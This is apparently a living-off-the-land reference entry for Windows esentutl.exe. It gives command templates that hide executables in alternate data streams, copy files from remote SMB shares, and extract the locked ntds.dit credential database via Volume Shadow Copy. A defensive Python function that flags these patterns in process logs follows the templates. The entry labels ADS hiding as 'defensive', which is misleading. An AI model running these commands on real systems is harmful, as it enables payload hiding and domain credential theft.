Esentutl.exe
Binary for working with Microsoft Joint Engine Technology (JET) databases
ADS
Copy file and hide it in an alternate data stream as a defensive countermeasure
esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o
Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. — MITRE: T1564.004 — Privileges: User
Extract hidden file within alternate data streams
esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o
Copies the source Alternate Data Stream (ADS) to the destination EXE. — MITRE: T1564.004 — Privileges: User
Copy file and hide it in an alternate data stream as a defensive countermeasure
esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o
Copies the remote source EXE to an Alternate Data Stream (ADS) of the destination file. — MITRE: T1564.004 — Privileges: User
Copy
Copies files from A to B
esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
Copies the source VBS file to the destination VBS file. — MITRE: T1105 — Privileges: User
Copy/extract a locked file such as the AD Database
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit}
Copies a (locked) file using Volume Shadow Copy — MITRE: T1003.003 — Privileges: Admin
Download
Use to copy files from one UNC path to another
esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o
Copies the source EXE to the destination EXE file — MITRE: T1564.004 — Privileges: User
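Detection
Added example (not part of the original entry and not LOLBAS project code): a Python triage function that parses an esentutl command line taken from process-creation logs and tags the copy patterns listed above. The tag names, sample paths and host names are constructed, and accepting "-" as a switch prefix is an assumption.

```python
import re
import shlex
DRIVE = re.compile(r"^[A-Za-z]:")
IMAGE = re.compile(r"(^|\\)esentutl(\.exe)?$", re.I)

def has_stream(path):
    """A colon beyond the drive letter means the path names an ADS."""
    return ":" in DRIVE.sub("", path, count=1)

def classify(cmdline):
    """Tag one process command line; [] when it is not an esentutl /y copy."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # backslashes stay literal
    except ValueError:                              # unbalanced quote
        tokens = cmdline.split()
    tokens = [t.strip('"') for t in tokens]
    if not tokens or not IMAGE.search(tokens[0]):
        return []
    switches, src, dst, i = set(), None, None, 1
    while i < len(tokens):
        tok = tokens[i]
        # Assumption: "-" is accepted as a switch prefix as well as "/".
        if tok.startswith(("/", "-")):
            if tok[1:].lower() == "d" and i + 1 < len(tokens):
                i, dst = i + 1, tokens[i + 1]   # /d takes the destination path
            else:
                switches.add(tok[1:].lower())
        elif src is None:
            src = tok                           # first bare path is the /y source
        i += 1
    if "y" not in switches or src is None:
        return []
    checks = [
        ("ads-source", has_stream(src)),                        # T1564.004
        ("ads-destination", bool(dst) and has_stream(dst)),     # T1564.004
        ("remote-source", src.startswith("\\\\")),
        ("remote-destination", bool(dst) and dst.startswith("\\\\")),
        ("vss-copy", "vss" in switches),                        # T1003.003
        ("ntds-dit", src.lower().endswith("\\ntds.dit")),       # T1003.003
    ]
    return ["copy"] + [tag for tag, hit in checks if hit]

# Constructed process-creation command lines (not real telemetry).
SAMPLES = [
    r"esentutl.exe /y \\fs01\share\tool.exe /d C:\Users\Public\notes.txt:file.exe /o",
    r"C:\Windows\System32\esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d C:\Temp\copy.dit",
]
if __name__ == "__main__":
    for s in SAMPLES: print(classify(s), s)
```

A result of only ["copy"] is the plain file copy case; any further tag marks one of the ADS, remote or Volume Shadow Copy patterns and is the part worth alerting on.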